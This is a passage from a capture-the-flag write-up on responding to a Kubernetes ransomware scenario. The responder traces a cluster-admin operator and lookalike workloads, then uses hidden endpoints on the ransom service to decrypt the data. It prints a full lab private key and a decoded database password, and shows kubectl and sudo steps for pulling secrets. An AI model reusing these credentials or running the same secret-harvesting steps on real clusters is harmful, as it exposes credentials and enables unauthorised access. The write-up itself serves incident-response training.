"make" to regenerate code after modifying this file

serviceEndpointPort <integer>

serviceEndpointPortName <string>

serviceEndpointReplicas <integer>

There isn’t much there; I guess it makes sense that an attacker wouldn’t document their tooling. Let’s also check whether there are any other suspicious-looking CRDs.

incident-responder@albatross-terminal:/$ kubectl api-resources | grep k8.io

serviceendpoints serviceendpoints.k8.io/v1beta2 true ServiceEndpoints

That’s the only resource under k8.io, and the full list (without the grep) looks normal. So let’s see whether any ServiceEndpoints objects exist.

incident-responder@albatross-terminal:/$ kubectl get -A serviceendpoints

NAMESPACE NAME AGE

kube-system serviceendpoints-api 4h52m

kube-system serviceendpoints-manager 4h52m

OK, there are two. Let’s get their YAML and start dissecting them.

incident-responder@albatross-terminal:/$ kubectl get -A serviceendpoints -o yaml

apiVersion: v1

items:

- apiVersion: serviceendpoints.k8.io/v1beta2

kind: ServiceEndpoints

metadata:

creationTimestamp: "2024-03-28T09:18:34Z"

generation: 1

name: serviceendpoints-api

namespace: kube-system

resourceVersion: "894"

uid: d8f1e6e3-9363-408c-8a1c-65f890da130b

spec:

clusterRoleBindingName: se-operator-webhook

serviceAccountName: se-operator-webhook

serviceEndpointEnvs:

- name: DB_HOST

value: albatross-database.albatross-backend.svc.cluster.local

- name: DB_USER

value: albatross-db

- name: DB_PASSWORD

valueFrom:

secretKeyRef:

key: password

name: psql-pw

- name: DB_NAME

value: payments

- name: DB_PORT

value: "5432"

- name: SSL_MODE

value: disable

- name: KAFKA_HOST

value: albatross-messaging-cluster-kafka-bootstrap.albatross-messaging.svc.cluster.local

- name: KAFKA_PORT

value: "9092"

- name: KAFKA_TOPIC

value: payment

- name: KAFKA_CLIENT_ID

value: albatross-api

serviceEndpointImage: docker.io/controlplaneoffsec/sinking-ship:albatross-apiv2

serviceEndpointLabels:

albatross: api

serviceEndpointName: albatross-api

serviceEndpointNamespace: albatross-api

serviceEndpointPort: 8080

serviceEndpointPortName: http

serviceEndpointReplicas: 2

- apiVersion: serviceendpoints.k8.io/v1beta2

kind: ServiceEndpoints

metadata:

creationTimestamp: "2024-03-28T09:18:34Z"

generation: 1

name: serviceendpoints-manager

namespace: kube-system

resourceVersion: "895"

uid: 3d8154f2-5418-4b80-98ea-aba35a159698

spec:

serviceEndpointCert: LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dnU2tBZ0VBQW9JQkFRREtKSm8rbDc5aHptWk4KMHlwZHhxQ0FVVG4wNW9ac3BlLzVvdzRxMUF0eGhKZ0FDWEtVbW1hVThZVmJaM3dRMVc0WTVpMVZCSUEwUzJ2OQpTWGZiYU10Zi8vL1p0MzJoTGtJRXlmOWtlS0dtSmFCSFFBdXViMGgybmluajRqNTJpcXFYWnFpbmYxRFlaRCtrCmk1T2dZenM1NzNDKzFqbVpIbzFYbXNuYlQxU3BSUmxZSm9SVnhDV2RoNFEwbUFCSUFFVFhOeVNnMjd2eHBPbkgKRERWcDZoS0RVQld1b2kxWXhhcHBtTlhqZ3FnMUc1aFIvN0krb3pkL0hKTmdQemEyRVZEbGR4NnBkdVFTVWJtcApUdU9HUHg5dnByREJIWnlFYmpROXdGSVdTUUV4ckE5NnA2NWJnU2lRaSs4c2dOTzIvSytWWlhKeTM2ZTBNQ2lXCjU5blpOcU9IQWdNQkFBRUNnZ0VBRXEvWWpJSEZ3UHB1TGJLZ1A0UU5zVjhRN3dsaWt1ZXlMQTg5VDR0RHRZNU8KNk8zMnFETXYyWVFNVW50YUZrcE12OE9EbkZEcXN5cm54RVlHN1FNZWpmVGlCNVAxYXJHV2k4L0txdFNXQ1FDQQpkU1hBRHJPZDdNMUpUUlpNdFBPenVvUlVnZ3Q4ZzB5ZEw0NXhxc21SbjVUNWhNTFVGMG9pUWQ5KzJxWFdTMEY4ClIvRjVRb2dxTnlJOVlJZW5vS3o3MEFOZkd4VEVTUDB6cmNQemc5eE9lNmZid3RFSURrYUFvWG1BcGpKdUR4VHYKZUFyOTNBQVpXSFc2dEQramkrKy9kWW5Oa2ZMSk1Gd251ZDM1STIzbGhDVTRKWUM2U3BsdFl0cUJxQmZOa1VpdApQcU94U2E4ZGNzcHI4ZzF1NU0yWUY2RnBDYk9NdUF0dk1GM0NpUzkraFFLQmdRRDY0TG1WWFJCSGh0eW9jQWNXCmJOYTZHMVR2c3FTaGVvSEJkeU55N3NBT3NSMjVURHFPbHcwNkdHYjM2RXRGTElNNjViVEJhNElLMUZNdExIOWwKNzBwd2JUb29lbVJaVytTYWgyaEt1OUFJR0RsQ0k0ZGZzSjFPWFlQcFZoQlRvT28xMEpGN1ZrWURBQkEwZC9KcApCR21wMXgyVENMTTVncmlDVjJLaXFYZUUyd0tCZ1FET1JTY2V3dVQ2YUY1bDdlUEtGblpHNU9lM1NjbGFQTzZiClQwVVliMkh5RTJHYTZmZHdlWkZ4RHI1aFBLL0gzN2JKUWdUQ2c1RFd5REZjSlg2MXNDTVV1Z1NCTzhGQ1dHVWgKd0ZPSGVHL3dSbmt3REZJUmdLWkk0MDNSVTdhTVE5MVFpTnNteFpRV1ZlY1dwdytpUmdzdGxIZzU0SmF1NXZ5dApyQmlQMFdsbHhRS0JnUURnQ2h2eGRTQjZuOGNpYkprSHY3NnFpSW43WFErRVhVRFBJclAzaVpyZUEvSEZibnZFCnBzUmJJenVoSEVOTHpRcU1hR0paY01hN0lRMytnNFJwNVo0V2RKVEJYVHVNU1hJSFJmRXUvRFkxWkZ5TjRlaWMKM2I0OUkyb1AwSm5YOVJYelpRVG1uZzc3MHV5bHpwQWVsS0EvMmlsQkN6M3lsL2hwL2R2SjQ0a21qUUtCZ0NMLwp1Tk9QWGlyZTZxV0E1OVd5V2Y5TmQ4T3gwV2h1VGs0cjlSMWdTTTQ2VzZWZGJZNjRFZVdOQ3VDVTIzNmVodlUvCkxtK1N3MUN1UnpITGF1U0pMbXFsNVgzSUZkS2NEUXpkQlU5SE1EY2t2Z3RaQzlQTWNHcU5wdmFOcmJ1L0NCNVMKR2wxSnlRYkJMS1M3VS92RXhzREZJR0V4cWw
raThkekdCcVRnYzNIQkFvR0JBSng4RWE3Y3RwekhBd05FLy9nSApVZTd1SHZmWkllMTRXYlpBRFBONmdWczhTYWdjU3JkSWwwbEl1cnpBMSt5QmlsZUdxbXRLeGNUNXdoT21rZStmCm5kSVN2RXhOS1hKQkZuYmVjbzJvczFrRVVOZ2MrUGtsM3EyUVpmcnc1MUVWQThUZy9PWVZ5WGF3cytQejl1b2oKVy92bTExaWRYTU1za3d2RzhQM2hvb2V3Ci0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0=

serviceEndpointEnvs:

- name: DB_HOST

value: albatross-database.albatross-backend.svc.cluster.local

- name: DB_USER

value: albatross-db

- name: DB_PASSWORD

valueFrom:

secretKeyRef:

key: password

name: psql-pw

- name: DB_NAME

value: payments

- name: DB_PORT

value: "5432"

- name: SSL_MODE

value: disable

- name: KAFKA_HOST

value: albatross-messaging-cluster-kafka-bootstrap.albatross-messaging.svc.cluster.local

- name: KAFKA_PORT

value: "9092"

- name: KAFKA_TOPIC

value: payment

- name: KAFKA_CLIENT_ID

value: albatross-processor

- name: KAFKA_GROUP_ID

value: albatross-processor

serviceEndpointImage: docker.io/controlplaneoffsec/sinking-ship:albatross-processorv2

serviceEndpointLabels:

albatross: processorv2

serviceEndpointName: albatross-processor

serviceEndpointNamespace: albatross-processor

serviceEndpointPort: 8888

serviceEndpointPortName: http

serviceEndpointReplicas: 1

kind: List

metadata:

resourceVersion: ""

So the API endpoint specifies a service account and a cluster role binding (both named se-operator-webhook). Let’s see what permissions they grant.

incident-responder@albatross-terminal:/$ kubectl get clusterrolebinding -o wide | grep se-operator-webhook

se-operator-webhook ClusterRole/cluster-admin 4h53m kube-system/se-operator-webhook

Interesting: this binds to cluster-admin. I wonder whether the operator is the persistence mechanism, with these workloads carrying out the main malicious operations. The manager endpoint also has a serviceEndpointCert field, so let’s decode that and see what it is.

$ base64 -d <<< LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dnU2tBZ0VBQW9JQkFRREtKSm8rbDc5aHptWk4KMHlwZHhxQ0FVVG4wNW9ac3BlLzVvdzRxMUF0eGhKZ0FDWEtVbW1hVThZVmJaM3dRMVc0WTVpMVZCSUEwUzJ2OQpTWGZiYU10Zi8vL1p0MzJoTGtJRXlmOWtlS0dtSmFCSFFBdXViMGgybmluajRqNTJpcXFYWnFpbmYxRFlaRCtrCmk1T2dZenM1NzNDKzFqbVpIbzFYbXNuYlQxU3BSUmxZSm9SVnhDV2RoNFEwbUFCSUFFVFhOeVNnMjd2eHBPbkgKRERWcDZoS0RVQld1b2kxWXhhcHBtTlhqZ3FnMUc1aFIvN0krb3pkL0hKTmdQemEyRVZEbGR4NnBkdVFTVWJtcApUdU9HUHg5dnByREJIWnlFYmpROXdGSVdTUUV4ckE5NnA2NWJnU2lRaSs4c2dOTzIvSytWWlhKeTM2ZTBNQ2lXCjU5blpOcU9IQWdNQkFBRUNnZ0VBRXEvWWpJSEZ3UHB1TGJLZ1A0UU5zVjhRN3dsaWt1ZXlMQTg5VDR0RHRZNU8KNk8zMnFETXYyWVFNVW50YUZrcE12OE9EbkZEcXN5cm54RVlHN1FNZWpmVGlCNVAxYXJHV2k4L0txdFNXQ1FDQQpkU1hBRHJPZDdNMUpUUlpNdFBPenVvUlVnZ3Q4ZzB5ZEw0NXhxc21SbjVUNWhNTFVGMG9pUWQ5KzJxWFdTMEY4ClIvRjVRb2dxTnlJOVlJZW5vS3o3MEFOZkd4VEVTUDB6cmNQemc5eE9lNmZid3RFSURrYUFvWG1BcGpKdUR4VHYKZUFyOTNBQVpXSFc2dEQramkrKy9kWW5Oa2ZMSk1Gd251ZDM1STIzbGhDVTRKWUM2U3BsdFl0cUJxQmZOa1VpdApQcU94U2E4ZGNzcHI4ZzF1NU0yWUY2RnBDYk9NdUF0dk1GM0NpUzkraFFLQmdRRDY0TG1WWFJCSGh0eW9jQWNXCmJOYTZHMVR2c3FTaGVvSEJkeU55N3NBT3NSMjVURHFPbHcwNkdHYjM2RXRGTElNNjViVEJhNElLMUZNdExIOWwKNzBwd2JUb29lbVJaVytTYWgyaEt1OUFJR0RsQ0k0ZGZzSjFPWFlQcFZoQlRvT28xMEpGN1ZrWURBQkEwZC9KcApCR21wMXgyVENMTTVncmlDVjJLaXFYZUUyd0tCZ1FET1JTY2V3dVQ2YUY1bDdlUEtGblpHNU9lM1NjbGFQTzZiClQwVVliMkh5RTJHYTZmZHdlWkZ4RHI1aFBLL0gzN2JKUWdUQ2c1RFd5REZjSlg2MXNDTVV1Z1NCTzhGQ1dHVWgKd0ZPSGVHL3dSbmt3REZJUmdLWkk0MDNSVTdhTVE5MVFpTnNteFpRV1ZlY1dwdytpUmdzdGxIZzU0SmF1NXZ5dApyQmlQMFdsbHhRS0JnUURnQ2h2eGRTQjZuOGNpYkprSHY3NnFpSW43WFErRVhVRFBJclAzaVpyZUEvSEZibnZFCnBzUmJJenVoSEVOTHpRcU1hR0paY01hN0lRMytnNFJwNVo0V2RKVEJYVHVNU1hJSFJmRXUvRFkxWkZ5TjRlaWMKM2I0OUkyb1AwSm5YOVJYelpRVG1uZzc3MHV5bHpwQWVsS0EvMmlsQkN6M3lsL2hwL2R2SjQ0a21qUUtCZ0NMLwp1Tk9QWGlyZTZxV0E1OVd5V2Y5TmQ4T3gwV2h1VGs0cjlSMWdTTTQ2VzZWZGJZNjRFZVdOQ3VDVTIzNmVodlUvCkxtK1N3MUN1UnpITGF1U0pMbXFsNVgzSUZkS2NEUXpkQlU5SE1EY2t2Z3RaQzlQTWNHcU5wdmFOcmJ1L0NCNVMKR2wxSnlRYkJMS1M3VS92RXhzREZJR0V4cWwraThk
ekdCcVRnYzNIQkFvR0JBSng4RWE3Y3RwekhBd05FLy9nSApVZTd1SHZmWkllMTRXYlpBRFBONmdWczhTYWdjU3JkSWwwbEl1cnpBMSt5QmlsZUdxbXRLeGNUNXdoT21rZStmCm5kSVN2RXhOS1hKQkZuYmVjbzJvczFrRVVOZ2MrUGtsM3EyUVpmcnc1MUVWQThUZy9PWVZ5WGF3cytQejl1b2oKVy92bTExaWRYTU1za3d2RzhQM2hvb2V3Ci0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0=

-----BEGIN PRIVATE KEY-----

MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDKJJo+l79hzmZN

0ypdxqCAUTn05oZspe/5ow4q1AtxhJgACXKUmmaU8YVbZ3wQ1W4Y5i1VBIA0S2v9

SXfbaMtf///Zt32hLkIEyf9keKGmJaBHQAuub0h2ninj4j52iqqXZqinf1DYZD+k

i5OgYzs573C+1jmZHo1XmsnbT1SpRRlYJoRVxCWdh4Q0mABIAETXNySg27vxpOnH

DDVp6hKDUBWuoi1YxappmNXjgqg1G5hR/7I+ozd/HJNgPza2EVDldx6pduQSUbmp

TuOGPx9vprDBHZyEbjQ9wFIWSQExrA96p65bgSiQi+8sgNO2/K+VZXJy36e0MCiW

59nZNqOHAgMBAAECggEAEq/YjIHFwPpuLbKgP4QNsV8Q7wlikueyLA89T4tDtY5O

6O32qDMv2YQMUntaFkpMv8ODnFDqsyrnxEYG7QMejfTiB5P1arGWi8/KqtSWCQCA

dSXADrOd7M1JTRZMtPOzuoRUggt8g0ydL45xqsmRn5T5hMLUF0oiQd9+2qXWS0F8

R/F5QogqNyI9YIenoKz70ANfGxTESP0zrcPzg9xOe6fbwtEIDkaAoXmApjJuDxTv

eAr93AAZWHW6tD+ji++/dYnNkfLJMFwnud35I23lhCU4JYC6SpltYtqBqBfNkUit

PqOxSa8dcspr8g1u5M2YF6FpCbOMuAtvMF3CiS9+hQKBgQD64LmVXRBHhtyocAcW

bNa6G1TvsqSheoHBdyNy7sAOsR25TDqOlw06GGb36EtFLIM65bTBa4IK1FMtLH9l

70pwbTooemRZW+Sah2hKu9AIGDlCI4dfsJ1OXYPpVhBToOo10JF7VkYDABA0d/Jp

BGmp1x2TCLM5griCV2KiqXeE2wKBgQDORScewuT6aF5l7ePKFnZG5Oe3SclaPO6b

T0UYb2HyE2Ga6fdweZFxDr5hPK/H37bJQgTCg5DWyDFcJX61sCMUugSBO8FCWGUh

wFOHeG/wRnkwDFIRgKZI403RU7aMQ91QiNsmxZQWVecWpw+iRgstlHg54Jau5vyt

rBiP0WllxQKBgQDgChvxdSB6n8cibJkHv76qiIn7XQ+EXUDPIrP3iZreA/HFbnvE

psRbIzuhHENLzQqMaGJZcMa7IQ3+g4Rp5Z4WdJTBXTuMSXIHRfEu/DY1ZFyN4eic

3b49I2oP0JnX9RXzZQTmng770uylzpAelKA/2ilBCz3yl/hp/dvJ44kmjQKBgCL/

uNOPXire6qWA59WyWf9Nd8Ox0WhuTk4r9R1gSM46W6VdbY64EeWNCuCU236ehvU/

Lm+Sw1CuRzHLauSJLmql5X3IFdKcDQzdBU9HMDckvgtZC9PMcGqNpvaNrbu/CB5S

Gl1JyQbBLKS7U/vExsDFIGExql+i8dzGBqTgc3HBAoGBAJx8Ea7ctpzHAwNE//gH

Ue7uHvfZIe14WbZADPN6gVs8SagcSrdIl0lIurzA1+yBileGqmtKxcT5whOmke+f

ndISvExNKXJBFnbeco2os1kEUNgc+Pkl3q2QZfrw51EVA8Tg/OYVyXaws+Pz9uoj

W/vm11idXMMskwvG8P3hooew

-----END PRIVATE KEY-----

A private key! Let’s save that for later.
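Despite the field being called serviceEndpointCert, the BEGIN PRIVATE KEY header marks an unencrypted PKCS#8 private key rather than a certificate. Here’s a quick sketch for checking what a base64 blob like this contains without dumping the whole thing to the terminal. pem_labels is a hypothetical helper name.

```python
import base64
import re

# Matches PEM armour lines such as "-----BEGIN PRIVATE KEY-----".
PEM_RE = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----")


def pem_labels(b64_value: str) -> list[str]:
    """Decode a base64 field and return the labels of any PEM blocks inside it."""
    text = base64.b64decode(b64_value).decode("ascii", errors="replace")
    return PEM_RE.findall(text)


# The first 36 characters of serviceEndpointCert decode to the BEGIN line alone.
print(pem_labels("LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0t"))  # ['PRIVATE KEY']
```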

Both ServiceEndpoints define workloads prefixed with albatross: one for an API and the other for a processor. Let’s dig into the application namespaces a little and see if anything jumps out.

incident-responder@albatross-terminal:/$ kubectl get -A pods | grep albatross

albatross-api albatross-api-78bd658b97-pxx9f 1/1 Running 0 4h57m

albatross-api albatross-api-78bd658b97-w4bpz 1/1 Running 2 (4h57m ago) 4h57m

albatross-api albatross-payment-api-7b695c59f7-bdfdc 1/1 Running 0 4h57m

albatross-api albatross-payment-api-7b695c59f7-mlh2j 1/1 Running 0 4h57m

albatross-backend albatross-database 1/1 Running 0 4h58m

albatross-dmz albatross-kanban 1/1 Running 0 4h57m

albatross-dmz albatross-terminal 1/1 Running 0 4h57m

albatross-messaging albatross-messaging-cluster-kafka-0 1/1 Running 0 4h56m

albatross-messaging albatross-messaging-cluster-zookeeper-0 1/1 Running 0 4h57m

albatross-processor albatross-payment-processor-779f5c6597-prv5v 1/1 Running 4 (4h56m ago) 4h57m

albatross-processor albatross-processor-76c579ff6d-kv5tm 1/1 Running 2 (4h57m ago) 4h57m

Interestingly, there are two sets of APIs and two sets of processors. Could malicious workloads be running in parallel with the real ones, named similarly to avoid detection?

I’m guessing the configurations in the service endpoints will help us figure out which ones are legitimate and which ones aren’t.
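One way to make that comparison systematic is a small heuristic. A pod plausibly belongs to a ServiceEndpoints object if all three of these hold:

- it is in the same namespace;
- its name starts with the serviceEndpointName followed by a dash, as Deployment pods do;
- it runs the exact serviceEndpointImage.

The SESpec type and match_pods helper are hypothetical names of my own. This is not how the operator itself tracks its workloads.

```python
from typing import NamedTuple


class SESpec(NamedTuple):
    namespace: str  # serviceEndpointNamespace
    name: str       # serviceEndpointName
    image: str      # serviceEndpointImage


def match_pods(pods: list[tuple[str, str, str]], specs: list[SESpec]) -> dict[str, str]:
    """Map each (namespace, pod name, image) to the serviceEndpointName that
    plausibly created it, or "unmatched" if no spec fits all three checks."""
    result = {}
    for namespace, pod, image in pods:
        owner = "unmatched"
        for spec in specs:
            if (namespace == spec.namespace
                    and pod.startswith(spec.name + "-")
                    and image == spec.image):
                owner = spec.name
                break
        result[pod] = owner
    return result
```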

incident-responder@albatross-terminal:/$ kubectl -n albatross-api get pods albatross-api-78bd658b97-pxx9f -o yaml | grep image:

image: docker.io/controlplaneoffsec/sinking-ship:albatross-apiv2

image: docker.io/controlplaneoffsec/sinking-ship:albatross-apiv2

incident-responder@albatross-terminal:/$ kubectl -n albatross-api get pods albatross-payment-api-7b695c59f7-bdfdc -o yaml | grep image:

image: docker.io/controlplaneoffsec/sinking-ship:albatross-apiv1

image: docker.io/controlplaneoffsec/sinking-ship:albatross-apiv1

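Based on the images and names, the workloads with the shorter names (albatross-api and albatross-processor) look to be the ones defined in the service endpoints. The albatross-api pods run albatross-apiv2, the image specified by serviceendpoints-api, while albatross-payment-api runs albatross-apiv1. Let’s see what these are running. Notably, the service endpoints define listening ports for both: 8080 for the API and 8888 for the processor. Let’s try connecting to both and see what happens.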

incident-responder@albatross-terminal:/$ kubectl -n albatross-api get pods -o wide

NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES

albatross-api-78bd658b97-pxx9f 1/1 Running 0 5h2m 192.168.84.136 node-1 <none> <none>

albatross-api-78bd658b97-w4bpz 1/1 Running 2 (5h2m ago) 5h2m 192.168.247.3 node-2 <none> <none>

albatross-payment-api-7b695c59f7-bdfdc 1/1 Running 0 5h3m 192.168.84.133 node-1 <none> <none>

albatross-payment-api-7b695c59f7-mlh2j 1/1 Running 0 5h3m 192.168.84.131 node-1 <none> <none>

incident-responder@albatross-terminal:/$ kubectl -n albatross-processor get pods -o wide

NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES

albatross-payment-processor-779f5c6597-prv5v 1/1 Running 4 (5h3m ago) 5h4m 192.168.84.132 node-1 <none> <none>

albatross-processor-76c579ff6d-kv5tm 1/1 Running 2 (5h4m ago) 5h4m 192.168.247.1 node-2 <none> <none>

incident-responder@albatross-terminal:/$ curl http://192.168.84.136:8080

404 page not found

incident-responder@albatross-terminal:/$ curl http://192.168.247.1:8888

THE KRAKEN HAS BEEN RELEASED

Please donate to recover your database

POST your payment to /api/v1/donate with json body {"payment":"amount"}

Once payment is confirmed, we will undo the Kraken's grip on your data.

Don't try to ACCESS the Kraken without basic auth, you will be DENIED.

Don't try to REVERSE the Kraken's tentacle, it holds no key.

Thank you for your cooperation.

Interesting: the processor looks to be a ransomware payment application. Let’s dig into it a bit. What happens if we “donate”?

incident-responder@albatross-terminal:/$ curl http://192.168.247.1:8888/api/v1/donate -d '{"payment": "100"}'

"Not Enough..."

No matter what value I give, it’s not enough… these damn hackers 😂

Looking at the message again, it mentions basic auth… could this be what the credentials we found earlier are for? Let’s add basic auth to our requests and see what we can find.

incident-responder@albatross-terminal:/$ curl -u kraken:auth http://192.168.247.1:8888/

THE KRAKEN HAS BEEN RELEASED

Please donate to recover your database

POST your payment to /api/v1/donate with json body {"payment":"amount"}

Once payment is confirmed, we will undo the Kraken's grip on your data.

Don't try to ACCESS the Kraken without basic auth, you will be DENIED.

Don't try to REVERSE the Kraken's tentacle, it holds no key.

Thank you for your cooperation.

incident-responder@albatross-terminal:/$ curl -u kraken:auth http://192.168.247.1:8888/api/v1/donate

404 page not found

incident-responder@albatross-terminal:/$ curl -u kraken:auth http://192.168.247.1:8888/api/v1/donate -d '{"payment": "100"}'

"Not Enough..."

# Trying access because of the ACCESS in capitals in the message

incident-responder@albatross-terminal:/$ curl -u kraken:auth http://192.168.247.1:8888/api/v1/access

Access Granted!

To Encrypt: PUT Request to /encrypt with json body {"key": "base64_key"}

To Decrypt: PUT Request to /decrypt with json body {"key": "base64_key"}

OK, so there’s a decryption endpoint that takes a base64-encoded key. I wonder whether the private key I found earlier would work. Conveniently, the serviceEndpointCert value is already base64-encoded, so it can be sent as-is.
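For reference, the request can be built in Python with only the standard library. This is a sketch: it builds the request without sending it, and build_decrypt_request is a hypothetical helper. The /api/v1/decrypt path comes from the successful attempt below. The JSON Content-Type header is my assumption; curl -d actually sends application/x-www-form-urlencoded, which the endpoint evidently accepted. The key is passed through exactly as stored in serviceEndpointCert.

```python
import base64
import json
import urllib.request


def build_decrypt_request(base_url: str, user: str, password: str, key_b64: str) -> urllib.request.Request:
    """Build (but don't send) a PUT to /api/v1/decrypt with Basic auth and a JSON body."""
    body = json.dumps({"key": key_b64}).encode()
    creds = base64.b64encode(f"{user}:{password}".encode()).decode()
    return urllib.request.Request(
        f"{base_url}/api/v1/decrypt",
        data=body,
        method="PUT",
        headers={
            "Authorization": f"Basic {creds}",
            "Content-Type": "application/json",  # assumption, see above
        },
    )
```

From inside the cluster, sending it would just be `urllib.request.urlopen(req)`.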

incident-responder@albatross-terminal:/$ curl -u kraken:auth http://192.168.247.1:8888/api/v1/access/decrypt -X PUT -d '{"key": "LS0tLS[..SNIP..]"}'

404 page not found

incident-responder@albatross-terminal:/$ curl -u kraken:auth http://192.168.247.1:8888/api/v1/decrypt -X PUT -d '{"key": "LS0tLS1C[..SNIP..]"}'

"Data Decrypted"

Nice! Let’s validate the decryption by connecting to the data store, which I’m guessing is the Postgres database. I remember seeing some psql-pw secrets earlier, so let’s grab the password along with the other connection details, such as hostname and username.

incident-responder@albatross-terminal:/$ kubectl -n albatross-api get secrets -o yaml

apiVersion: v1

items:

- apiVersion: v1

data:

password: YWxiYXRyb3NzZGF0YXN0b3JlNHBheW1lbnRz

kind: Secret

metadata:

name: psql-pw

namespace: albatross-api

[..SNIP..]

incident-responder@albatross-terminal:/$ base64 -d <<< YWxiYXRyb3NzZGF0YXN0b3JlNHBheW1lbnRz ; echo

albatrossdatastore4payments

incident-responder@albatross-terminal:/$ kubectl -n albatross-api get pods albatross-payment-api-7b695c59f7-vnkc7 -o yaml | grep DB -A 1

- name: DB_HOST

value: albatross-database.albatross-backend.svc.cluster.local

- name: DB_USER

value: albatross-db

- name: DB_PASSWORD

valueFrom:

--

- name: DB_NAME

value: payments

- name: DB_PORT

value: "5432"
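Those env vars map directly onto a libpq connection URI. Here’s a small sketch of assembling one, with the user and password percent-encoded in case they contain reserved characters. pg_uri is a hypothetical helper name. When SSL_MODE is absent, it falls back to libpq’s default sslmode of prefer.

```python
from urllib.parse import quote


def pg_uri(env: dict[str, str], password: str) -> str:
    """Assemble a postgresql:// URI from DB_* env vars; SSL_MODE maps to libpq's sslmode."""
    user = quote(env["DB_USER"], safe="")
    secret = quote(password, safe="")
    sslmode = env.get("SSL_MODE", "prefer")  # libpq's default when unset
    return (f"postgresql://{user}:{secret}@{env['DB_HOST']}:{env['DB_PORT']}"
            f"/{env['DB_NAME']}?sslmode={sslmode}")
```

The result can be passed straight to psql as its database argument. That leaves the password visible in the process list, though, so the interactive -W prompt used below is the more careful option.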

Now let’s try connecting. We need the psql client, but we’re the unprivileged incident-responder user on the terminal, so let’s see whether sudo gives us root.

incident-responder@albatross-terminal:/$ sudo -s

root@albatross-terminal:/#

It does. Nice! Let’s quickly install postgresql-client and move on.

incident-responder@albatross-terminal:/$ psql -h albatross-database.albatross-backend.svc.cluster.local -U albatross-db -W payments

Password:

psql (16.2 (Debian 16.2-1))

Type "help" for help.

payments=# \d

List of relations

Schema | Name | Type | Owner

--------+-----------------+----------+--------------

public | payments | table | albatross-db

public | payments_id_seq | sequence | albatross-db

(2 rows)

payments=# select * from payments;

id | created_at | updated_at | deleted_at | account | email | first_name | last_name | amount

----+------------------------+-------------------------------+------------+---------------+------------------------+-------------+-----------+----------------------------------------------

[..SNIP..]

82 | 0001-01-01 00:00:00+00 | 2024-03-28 14:46:53.163193+00 | | 9-99-CTF-FLAG | flag@ctf.flag | CTF | FLAG | flag_ctf{DECRYPTED_RANSOMWARE_DATA_RESTORED}

[..SNIP..]

(91 rows)

There is our second flag. All that’s left now is to delete the malicious workloads. I also need to think about where the flag would be after deletion. I know ControlPlane tend to have secrets pop into the cluster once a desired state has been reached, and I wonder whether the same thing happens here. Going back to the Kanban board, I notice another entry: “DMS Secret for Removed Malicious Workloads”. That implies a new secret will appear in the albatross-dmz namespace once we’re done.

Let’s start by trying to delete the processor and see what happens.

incident-responder@albatross-terminal:/$ kubectl -n albatross-processor delete pod albatross-processor-76c579ff6d-xj9lh

pod "albatross-processor-76c579ff6d-xj9lh" deleted

incident-responder@albatross-terminal:/$ kubectl -n albatross-dmz get secret

No resources found in albatross-dmz namespace.

Nothing, and looking back in albatross-processor, the pod is right back. Of course: the pod belongs to a Deployment whose ReplicaSet simply replaces it, so we should be deleting the related Deployment instead.
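Rather than guessing which controller to delete, we can follow metadata.ownerReferences upwards from the pod. A Deployment’s pods are controlled by a ReplicaSet, which is in turn controlled by the Deployment. This sketch works over objects as returned by `kubectl get -o json`. It assumes they’ve already been fetched into a lookup dict, and owner_chain is a hypothetical helper.

```python
from __future__ import annotations


def controller_owner(obj: dict) -> tuple[str, str] | None:
    """Return (kind, name) of the ownerReference marked controller: true, if any."""
    for ref in obj.get("metadata", {}).get("ownerReferences", []):
        if ref.get("controller"):
            return ref["kind"], ref["name"]
    return None


def owner_chain(obj: dict, lookup: dict[tuple[str, str], dict]) -> list[str]:
    """Follow controller ownerReferences upwards, e.g. Pod -> ReplicaSet -> Deployment.

    `lookup` maps (kind, name) to objects already fetched from the same namespace.
    """
    chain = [f"{obj['kind']}/{obj['metadata']['name']}"]
    while (owner := controller_owner(obj)) is not None:
        chain.append(f"{owner[0]}/{owner[1]}")
        obj = lookup.get(owner)
        if obj is None:
            break  # owner not fetched; stop rather than guess
    return chain
```

Here the chain should stop at the Deployment. Whatever recreated the Deployment itself (presumably the operator) wouldn’t necessarily show up, because owner references can’t point across namespaces.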

incident-responder@albatross-terminal:/$ kubectl -n albatross-processor delete deployment albatross-processor

deployment.apps "albatross-processor" deleted

Still no secret, so let’s keep going with the API, the service endpoints and the operator.

incident-responder@albatross-terminal:/$ kubectl -n albatross-api delete deployment albatross-api
deployment.apps "albatross-api" deleted
incident-responder@albatross-terminal:/$ kubectl -n kube-system delete serviceendpoints serviceendpoints-api serviceendpoints-manager
serviceendpoints.serviceendpoints.k8.io "serviceendpoints-api" deleted
serviceendpoints.serviceendpoints.k8.io "serviceendpoints-manager" deleted
incident-responder@albatross-terminal:/$ kubectl -n kube-system delete deployment se-operator-controller-manager
deployment.apps "se-operator-controller-manager" deleted
incident-responder@albatross-terminal:/$ kubectl -n albatross-dmz get secret
No resources found in albatross-dmz namespace.

Still nothing.

Checking the pods again, I notice the API and processor are back! Of course: we deleted their deployments while the operator and its service endpoints still existed, so the operator simply recreated them. Interestingly, the recreated deployments survived the service endpoints being deleted. Either we deleted the operator too quickly, or it doesn’t clean up deployments when their service endpoints are removed. Let’s delete those deployments again.
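In hindsight, the deployments just need to go last. Below is a sketch of that ordering using the names from this challenge. remove_albatross_workloads is a hypothetical wrapper, not something from the challenge. The service endpoints and the operator are removed first, in the same order that worked above, so nothing is left to recreate the deployments.

```shell
# Sketch: remove the malicious workloads so the operator can't recreate them.
# Stops at the first failing kubectl call.
remove_albatross_workloads() {
  # 1. Remove the custom resources the operator reconciles deployments from.
  kubectl -n kube-system delete serviceendpoints serviceendpoints-api serviceendpoints-manager || return 1
  # 2. Remove the operator itself.
  kubectl -n kube-system delete deployment se-operator-controller-manager || return 1
  # 3. Only now delete the deployments, once nothing will recreate them.
  kubectl -n albatross-api delete deployment albatross-api || return 1
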